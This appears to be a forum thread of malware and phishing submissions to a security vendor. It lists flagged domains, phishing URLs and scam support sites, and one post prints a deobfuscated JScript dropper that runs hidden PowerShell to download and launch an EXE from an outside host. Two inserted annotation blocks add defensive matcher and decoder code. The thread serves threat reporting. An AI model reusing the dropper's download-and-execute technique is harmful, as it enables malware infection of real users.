Aura

Aura Malware Submissions

638 posts in this topic

RBC Royal Bank Phishing.

http://grm-opt.by/Qc5LCmP5z/index.php

 


Thank you for your submission. A database update has already been issued and will be available via online update within the next minutes.


Flagged by our Palo Alto Networks Firewall.

freemaintenancesafesystem4unow.website
freemaintenancesafesystem4unow.download
freemaintenancesafesystem4unow.space
gogrdm.abledaddepend.top
liveupdate45678safesystems.top
7safesystems4you.website -> Domain name incomplete
a3fc.clearsecureredir.com
elfagrtours-eg.com
24safesystems4younow.bid -> Domain name incomplete
e247safesystems4you.site -> Domain name incomplete

You can see that there's a pattern with the "system4you", "system4u", "system4unow", etc. websites.

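The naming pattern called out in the submission above can be turned into a reusable matcher. The block below is an added example, not code from the original post or from the firewall vendor; it assumes a single-label TLD (.top, .bid, .website and so on), and the sample list is constructed from the domains in this thread plus three negatives.

```javascript
// Added example, not part of the original post: the "safesystem(s)4u / 4you / 4unow" naming
// pattern flagged above, written as a reusable matcher and run over a constructed list.
// Pattern as observed: optional alphanumeric prefix, "safesystem" or "safesystems", an
// optional "4u"/"4you" with optional "now", as the label directly under a one-label TLD.
// Assumption: single-label TLDs only; co.uk-style suffixes would need a public-suffix list.
const CAMPAIGN_RE = /(?:^|\.)[a-z0-9-]*safesystems?(?:4(?:u|you)(?:now)?)?\.[a-z]+$/i;

// Works on the firewall's truncated entries too ("Domain name incomplete" above): the
// campaign string sits at the end of the label, so a lost prefix does not break the match.
function isCampaignDomain(domain) {
  return CAMPAIGN_RE.test(domain.trim());
}

function flagDomains(domains) {
  return domains.filter(isCampaignDomain);
}

// Constructed sample: the flagged domains from this and later posts in the thread, plus
// "safesystems.example.com" as a negative (the string is only matched as the label under the TLD).
const SAMPLE = [
  "freemaintenancesafesystem4unow.website",
  "freemaintenancesafesystem4unow.download",
  "freemaintenancesafesystem4unow.space",
  "gogrdm.abledaddepend.top",
  "liveupdate45678safesystems.top",
  "7safesystems4you.website",
  "a3fc.clearsecureredir.com",
  "elfagrtours-eg.com",
  "24safesystems4younow.bid",
  "e247safesystems4you.site",
  "upgradesafesystem4unow.pw",
  "5678safesystems.download",
  "safesystems.example.com",
];

console.log(flagDomains(SAMPLE));
```

The regex is deliberately anchored on the second-level label so that a legitimate host that merely contains "safesystems" in a subdomain is not swept up; widen it only after checking the false-positive rate against your own DNS logs.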

Thank you for your submission. I will look into it as soon as possible.


E-mail impersonating Paypal leads to a Microsoft account phishing website.

http://appointmentwindow.space-to-rent.com/
http://loginorder44301029.ddnsking.com/weblogin/CA/OutAuth.php?wsignin=1&locale=en-us&loginlive=92995339817254973&SrcID=92995339817254973

Flagged by our Palo Alto Networks Firewall.

setupforfree.ddns.net
pthdr.com

Thank you for your submission. I will look into it as soon as possible.


Flagged by our Palo Alto Networks Firewall.

tabila.biz
aff.mobi
fixmediadb.com
bma-autohaus.com
abledaddepend.top

Thank you for your submission. I will look into it as soon as possible.


Flagged by our Palo Alto Networks Firewall.

upgradesafesystem4unow.pw
acacionesmachupicchu.com -> Incomplete domain name (192.5.6.30 a.gtld-servers.net)
yourlovelive.com
srv1.delo-teh.ru

Thank you for your submission. I will look into it as soon as possible.


Flagged by our Palo Alto Networks Firewall.

Implant-dentaire-en-hongrie.fr
southernbdltd.com

Thank you for your submission. I will look into it as soon as possible.


Flagged by our Palo Alto Networks Firewall.

plecertifiedtraining.com -> Incomplete domain name (192.41.162.30)
www.thefantasydoctots.com
j1ti2.5387882.com
mwiouli.bud-crate-ago.ru -> Incomplete domain name (107.20.195.169)

Thank you for your submission. I will look into it as soon as possible.


Flagged by our Palo Alto Networks Firewall.

kurazi.top
www.arfd.info
fas.tekun.gov.my

Thank you for your submission. I will look into it as soon as possible.


Was spammed on BC.

http://www.windows10-technical-support.com/
http://www.quickbookscontactsupport.com/
1-888-352-9606

Thank you for your submission. I will look into it as soon as possible.


Spammed on GTG.

http://www.windows-supports.co.uk/windows-customer-service.php
http://www.microsoft-help.co.uk/
http://www.ukinfotechltd.com/

Thank you for your submission. I will look into it as soon as possible.


Spammed on BC.

http://computer-security.co.uk/
http://pc-antivirus.co.uk
http://virus-protections.co.uk/
http://email-customer-service.co.uk/

Thank you for your submission. I will look into it as soon as possible.


Flagged by our Palo Alto Networks Firewall.

repository.certum.pl
vmsrcysblnvlak.in -> Might be incomplete
www.arfd.info
hitechprint.co.uk
uykdxtsjgorq.website

Thank you for your submission. I will look into it as soon as possible.


Flagged by our Palo Alto Networks Firewall.

cdn7.91free.com
teklectic.com
dnspod-free.mydnspod.net (184.105.206.63)
repulsion.unsexed.ru (205.251.192.223)
ecoloinfo.com
nwp.trooper-policeman.ru (54.77.72.254)
www.mobiletrak.co
laparotomy.su

Thank you for your submission. I will look into it as soon as possible.


Flagged by our Palo Alto Networks Firewall.

5678safesystems.download -> Incomplete domain name (might be 12345678safesystems.download)
gateway.personali.com
garageartcafe.com

Thank you for your submission. I will look into it as soon as possible.


Flagged by our Palo Alto Networks Firewall.

vizagchildrensclub.org
grcroadshow.com
bak.adninjia.com
royano151201552.ddns.net -> Incomplete domain name

Thank you for your submission. I will look into it as soon as possible.


Flagged by our Palo Alto Networks Firewall.

betterforlesshome.com
cuntwa.com

Thank you for your submission. I will look into it as soon as possible.


Flagged by our Palo Alto Networks Firewall.

dashl.ca
pzqm.3322.org

Thank you for your submission. I will look into it as soon as possible.


Flagged by our Palo Alto Networks Firewall.

anyupdate.net
giezdertyp.swallowash.ru
vemnm.earlybriefcase.gdn
urbangardensgeraldton.net.au
ew.health-carereform.com
u.nya.is
www.driverupdate.net
romyandjacob.com
https://docs.google.com/uc?export=download&id=0B0gQujlN-1V5aG85TWtmemZ6R00 

Leads to Canada - Parking Ticket (4).zip, which contains Canada - Parking Ticket (4).js. Slightly deobfuscated for comprehension purposes.

// Two WSH COM objects; the mixed-case ProgIDs resolve normally and only defeat naive string matching
var lLpPuIOx = new ActiveXObject("Shell.appliCaTIoN");
var IUeGjl = new ActiveXObject("WSCRipt.sheLl");
// Registry value path padded with junk "Q" characters; once stripped it reads
// HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir (every f/F is missing from this
// posted copy, e.g. "sotwaRe", "mICrosOt", "prograMilEsDir", as it is below in "-noproile" and "downloadile")
var xLVaNQC = ""+
"HKQLM\\sQoQ"+
"tQwQaQRe\\mQIQCrosQOQt\\wQiQNQdQ"+
"OQws\\curQreNTQvEQRsQiQOn\\p"+
"QrQogrQaQMQilQEQsQDQir";
xLVaNQC = xLVaNQC.replace(/\Q/g, "");  // \Q is an identity escape here, so this removes every "Q"
// Payload, run through cmd /c: "ping localhost" is a few seconds' delay, then PowerShell downloads the EXE and starts it.
// Note the missing backslash after %appdAta%: the file lands in AppData as "RoaminguOE78.exE", not inside Roaming.
var xVPpWShL = 'lLpPuIOx.ShellExecute("cmd.ExE", "/c ping localhost & powershell.exe -executionpolicy bypass -noproile -windowstyle hidden (new-object system.net.webclient).downloadile(\'http://hips2thighs.com/1nytaixucoxynidzoizip.exe?xerYK\',\'%appdAta%uOE78.exE\'); stARt-process \'%appdata%uOE78.exe\'", "", "open", 0);';
// 845251132/76841012 is exactly 11; with the default "C:\Program Files" that is "F", the padding character to strip from the command
var HTZnQc = IUeGjl.RegRead(xLVaNQC).charAt(845251132/76841012);
// Strip the padding, then run the ShellExecute call; the final argument 0 (SW_HIDE) keeps the cmd window hidden
eval(xVPpWShL.replace(RegExp(HTZnQc, "g"), ""));

Downloads 1nytaixucoxynidzoizip.exe from:

http://hips2thighs.com/1nytaixucoxynidzoizip.exe

https://www.virustotal.com/pt/file/63c18e94b61dfc0fbbaf223c36638e42c4bcc8631e99d04c90f93eaea6a261c8/analysis/1488209624/

1nytaixucoxynidzoizip.zip

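The dropper in the post above can be decoded without executing it by handing the script stub versions of the two WSH objects it relies on, so the ShellExecute call is captured instead of run. The block below is an added example, not code from the original post. It assumes the default "C:\Program Files" install path for the registry value; the sample strings are reconstructed from the post with the f/F letters the forum copy lost restored ("software", "-noprofile", "downloadfile"), and the "F" padding characters are placed illustratively, since their positions in the real sample are not shown.

```javascript
// Added example, not part of the original post: decode the Canada - Parking Ticket dropper
// statically by stubbing Shell.Application and WScript.Shell so nothing is executed.

// Constructed input, reconstructed from the posted sample. The posted copy lost every f/F
// ("sotwaRe", "-noproile", "downloadile"); they are restored here, and two illustrative "F"
// padding characters ("cFmd", "poFwershell") stand in for the ones the script strips.
const REG_PATH_OBF =
  "HKQLM\\sQoQfQtQwQaQRe\\mQIQCrosQOQfQt\\wQiQNQdQOQws\\curQreNTQvEQRsQiQOn\\pQrQogrQaQMQFilQEQsQDQir";
const CMD_OBF =
  `lLpPuIOx.ShellExecute("cFmd.ExE", "/c ping localhost & poFwershell.exe -executionpolicy bypass ` +
  `-noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile(` +
  `'http://hips2thighs.com/1nytaixucoxynidzoizip.exe?xerYK','%appdAta%uOE78.exE'); ` +
  `stARt-process '%appdata%uOE78.exe'", "", "open", 0);`;

// Stub registry; assumption: default Program Files path. Registry paths are case-insensitive.
const FAKE_REGISTRY = new Map([
  ["hklm\\software\\microsoft\\windows\\currentversion\\programfilesdir", "C:\\Program Files"],
]);

// Stand-in for WScript.Shell.RegRead
function fakeRegRead(path) {
  const value = FAKE_REGISTRY.get(path.toLowerCase());
  if (value === undefined) throw new Error("RegRead: no stub value for " + path);
  return value;
}

function decodeDropper(regPathObf = REG_PATH_OBF, cmdObf = CMD_OBF) {
  const calls = [];
  // Stand-in for Shell.Application: record the ShellExecute arguments instead of running anything
  const shellApp = { ShellExecute: (...args) => { calls.push(args); } };

  const regPath = regPathObf.replace(/\Q/g, "");                      // same regex as the sample: strips every "Q"
  const padChar = fakeRegRead(regPath).charAt(845251132 / 76841012);   // index 11 of "C:\Program Files" -> "F"
  const command = cmdObf.replace(RegExp(padChar, "g"), "");            // remove the "F" padding

  // The sample eval()s `command`; here it runs with only the stub object in scope
  new Function("lLpPuIOx", command)(shellApp);
  if (calls.length !== 1) throw new Error("expected exactly one ShellExecute call");

  const [exe, args, , verb, showCmd] = calls[0];
  return {
    regPath,
    padChar,
    exe,
    verb,
    hiddenWindow: showCmd === 0,                                        // SW_HIDE
    downloadUrl: (args.match(/https?:\/\/[^'"\s]+/) || [null])[0],
    dropPath: (args.match(/'(%appdata%[^']*)'/i) || [null, null])[1],
    commandLine: args,
  };
}

console.log(decodeDropper());
```

Capturing the call rather than emulating cmd and PowerShell is enough here: the network indicator, the drop path and the hidden-window flag all sit in the ShellExecute arguments, which is what a detection or a blocklist entry needs.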

Thank you for your submission. I will look into it as soon as possible.

